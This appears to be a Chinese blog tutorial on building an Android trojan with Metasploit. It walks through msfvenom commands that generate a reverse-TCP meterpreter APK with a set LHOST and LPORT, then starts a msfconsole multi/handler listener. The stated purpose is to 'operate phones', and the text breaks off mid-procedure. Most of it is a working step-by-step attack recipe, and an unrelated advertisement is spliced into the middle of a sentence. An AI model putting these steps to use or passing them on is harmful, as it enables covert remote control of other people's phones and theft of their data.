Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。
这篇文档只适合在Ce
《Android学习笔记总结+最新移动架构视频+大厂安卓面试真题+项目实战源码讲义》
【docs.qq.com/doc/DSkNLaERkbnFoS0ZF】 完整内容开源分享
ntos Linux已经安装了Metasploit的大伙。没有安装Metasploit的小伙们,可以前往
https://blog.csdn.net/wyvbboy/article/details/51526640
博客去浏览并安装,然后再回来~(如果此博客的安装已经过期了,官方找或者网上找)
看完Metasploit简介后,其下有一个工具msfvenom可以生成木马,打开linux终端,最好登录root,怕出错,然后输入命令
$ msfvenom
Enter下看看都啥?一大堆指令让你烦~
先查看一下所有类型的攻击负荷(看成木马也行),输入命令
$ msfvenom --list payloads
Enter下来,数据很多,我们从里面找Android类型的就行,我是来操控手机的,不会干其它的
复制一下黄色框的字段,tcp格式的,接下来会用到
android/meterpreter/reverse_tcp
知道了“木马”的名称,还得知道终端的ip,输入ifconfig查看内网ip(俺的是本地测试的)
$ ifconfig
ip拿到了,还不赶紧的开始生成木木马-_-,msfvenom兄弟,靠你了,输入
$ msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.122.129 LPORT=3333 R > first.apk
-p, --payload 使用攻击负荷。指定一个’-'或者输入(stdin)用户自定义的payloads(攻击负荷)。
LHOST ip地址
LPORT 自定义端口(注意,那些所谓的防火墙全踏马都要关闭,记得端口要放行且没被占用,不然渗透没软用)
生成的木马最好能放在一个可以访问的文件夹上,我直接first.apk,在终端目前路径上可以看到有文件生成。如果没有,那就是失败了,检查一下你的端口是否占用!生成成功的编译大概会出现Payload size: 10181 bytes字段
木马生成完毕,msfvenom兄弟的工作就基本完工了,接下来就有请msfconsole上场了,没错,就是打开metasploit的控制台,着手配置相关信息,开始渗透了~
直接输入msfconsole
$ msfconsole
长久看多了单调代码的你,下面的图形代码有没有让你灰色的世界多点点色彩~~
谈正事~我们需要配置什么呢?前面生成木马的时候不是设置了ip和端口吗?现在我们也要在控制台上配置ip和端口,做监听来的
要做的流程大概是这些
(在msfconsole模式下)加载exploit模块
msf > use exploit/multi/handler
(exploit模式下)选择之前我们粘贴过一次的攻击载荷:android/meterpreter/reverse_tcp
